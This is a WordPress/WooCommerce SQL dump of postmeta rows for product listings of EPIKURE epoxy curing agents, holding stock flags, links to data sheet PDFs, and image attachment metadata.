INSERT INTO `wp_postmeta` VALUES (13267, 1181, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13268, 1181, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13269, 1181, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13270, 1181, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13271, 1181, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13272, 1181, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13273, 1181, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13274, 1181, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13275, 1181, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13276, 1181, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13277, 1181, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13278, 1181, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13279, 1181, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13280, 1181, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13281, 1181, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13282, 1181, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13283, 1181, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13284, 1181, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13285, 1181, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13286, 1181, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13287, 1181, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13288, 1181, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13289, 1181, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13290, 1181, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13291, 1181, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13292, 1183, '_edit_lock', '1474651411:3'); 
INSERT INTO `wp_postmeta` VALUES (13293, 1183, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13294, 1184, '_wp_attached_file', '2016/09/3233.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13295, 1183, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13296, 1183, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13297, 1183, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13298, 1183, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13299, 1183, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13300, 1183, '318_custom_list_file', 'a:2:{s:32:"1da344428b4213de2f49db0906f902b6";a:3:{s:4:"name";s:12:"EPIKURE 3223";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3233.pdf";s:4:"desc";s:16:"EPIKURE 3223 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13301, 1183, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13302, 1183, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13303, 1183, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13304, 1183, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13305, 1183, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13306, 1183, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13307, 1183, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13308, 1183, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13309, 1183, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13310, 1183, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13311, 1183, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13312, 1183, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13313, 1183, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13314, 1183, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13315, 1183, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13316, 1183, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13317, 1183, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13318, 1183, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13319, 1183, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13320, 1183, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13321, 1183, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13322, 1183, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13323, 1183, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13324, 1183, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13325, 1183, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13326, 1183, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13327, 1183, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13328, 1183, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13329, 1183, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13330, 1183, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13331, 1183, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13332, 1185, '_edit_lock', '1474651397:3'); 
INSERT INTO `wp_postmeta` VALUES (13333, 1185, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13334, 1186, '_wp_attached_file', '2016/09/3223-3234-3245.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13335, 1185, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13336, 1185, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13337, 1185, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13338, 1185, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13339, 1185, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13340, 1185, '318_custom_list_file', 'a:2:{s:32:"3856f07c1230c6dc297a8dae1e3bf958";a:3:{s:4:"name";s:12:"EPIKURE 3234";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3223-3234-3245.pdf";s:4:"desc";s:12:"EPIKURE 3234";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13341, 1185, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13342, 1185, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13343, 1185, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13344, 1185, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13345, 1185, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13346, 1185, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13347, 1185, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13348, 1185, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13349, 1185, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13350, 1185, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13351, 1185, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13352, 1185, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13353, 1185, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13354, 1185, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13355, 1185, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13356, 1185, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13357, 1185, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13358, 1185, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13359, 1185, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13360, 1185, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13361, 1185, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13362, 1185, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13363, 1185, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13364, 1185, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13365, 1185, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13366, 1185, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13367, 1185, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13368, 1185, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13369, 1185, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13370, 1185, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13371, 1187, '_edit_lock', '1479930119:3'); 
INSERT INTO `wp_postmeta` VALUES (13372, 1187, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13373, 1187, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13374, 1187, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13375, 1187, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13376, 1187, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13377, 1187, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13378, 1187, '318_custom_list_file', 'a:2:{s:32:"f34f75d78c067f1fe9c108dbfcfc2370";a:3:{s:4:"name";s:12:"EPIKURE 3245";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3223-3234-3245.pdf";s:4:"desc";s:16:"EPIKURE 3245 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13379, 1187, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13380, 1187, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13381, 1187, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13382, 1187, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13383, 1187, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13384, 1187, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13385, 1187, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13386, 1187, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13387, 1187, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13388, 1187, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13389, 1187, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13390, 1187, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13391, 1187, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13392, 1187, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13393, 1187, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13394, 1187, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13395, 1187, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13396, 1187, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13397, 1187, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13398, 1187, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13399, 1187, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13400, 1187, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13401, 1187, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13402, 1187, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13403, 1187, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13404, 1187, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13405, 1187, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13406, 1187, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13407, 1187, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13408, 1187, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13409, 1187, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13410, 1072, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13411, 1188, '_wp_attached_file', '2016/09/miller-stephenson-banner-e1472825566105.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13412, 1188, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:51:"2016/09/miller-stephenson-banner-e1472825566105.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:50:"miller-stephenson-banner-e1472825566105-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13413, 1188, '_edit_lock', '1472834334:2'); 
INSERT INTO `wp_postmeta` VALUES (13414, 1188, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:28:"miller-stephenson-banner.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:35:"miller-stephenson-banner-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13415, 1189, '_edit_lock', '1474651378:3'); 
INSERT INTO `wp_postmeta` VALUES (13416, 1189, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13417, 1190, '_wp_attached_file', '2016/09/3271.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13418, 1189, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13419, 1189, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13420, 1189, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13421, 1189, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13422, 1189, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13423, 1189, '318_custom_list_file', 'a:2:{s:32:"e8778ddb4cffb7a841e9e9ce6abbdceb";a:3:{s:4:"name";s:12:"EPIKURE 3271";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3271.pdf";s:4:"desc";s:16:"EPIKURE 3271 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13424, 1189, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13425, 1189, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13426, 1189, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13427, 1189, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13428, 1189, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13429, 1189, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13430, 1189, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13431, 1189, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13432, 1189, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13433, 1189, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13434, 1189, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13435, 1189, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13436, 1189, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13437, 1189, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13438, 1189, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13439, 1189, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13440, 1189, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13441, 1189, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13442, 1189, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13443, 1189, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13444, 1189, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13445, 1189, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13446, 1189, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13447, 1189, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13448, 1189, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13449, 1189, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13450, 1189, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13451, 1189, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13452, 1189, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13453, 1189, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13454, 1191, '_edit_lock', '1474651370:3'); 
INSERT INTO `wp_postmeta` VALUES (13455, 1191, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13456, 1192, '_wp_attached_file', '2016/09/3274.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13457, 1191, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13458, 1191, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13459, 1191, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13460, 1191, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13461, 1191, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13462, 1191, '318_custom_list_file', 'a:2:{s:32:"fbd3721a0896603b4f60f1f9bd8b3da0";a:3:{s:4:"name";s:12:"EPIKURE 3274";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3274.pdf";s:4:"desc";s:16:"EPIKURE 3274 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13463, 1191, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13464, 1191, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13465, 1191, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13466, 1191, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13467, 1191, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13468, 1191, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13469, 1191, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13470, 1191, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13471, 1191, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13472, 1191, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13473, 1191, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13474, 1191, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13475, 1191, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13476, 1191, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13477, 1191, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13478, 1191, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13479, 1191, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13480, 1191, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13481, 1191, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13482, 1191, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13483, 1191, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13484, 1191, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13485, 1191, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13486, 1191, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13487, 1191, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13488, 1191, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13489, 1191, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13490, 1191, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13491, 1191, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13492, 1191, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13493, 1193, '_edit_lock', '1479399608:3'); 
INSERT INTO `wp_postmeta` VALUES (13494, 1193, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13495, 1194, '_wp_attached_file', '2016/09/3282.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13496, 1193, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13497, 1193, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13498, 1193, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13499, 1193, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13500, 1193, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13501, 1193, '318_custom_list_file', 'a:2:{s:32:"c32218cc6a13f21ac09fa4dca75eef87";a:3:{s:4:"name";s:12:"EPIKURE 3282";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3282.pdf";s:4:"desc";s:16:"EPIKURE 3282 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13502, 1193, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13503, 1193, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13504, 1193, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13505, 1193, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13506, 1193, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13507, 1193, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13508, 1193, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13509, 1193, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13510, 1193, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13511, 1193, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13512, 1193, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13513, 1193, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13514, 1193, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13515, 1193, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13516, 1193, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13517, 1193, '_sale_price_dates_from', ''); 
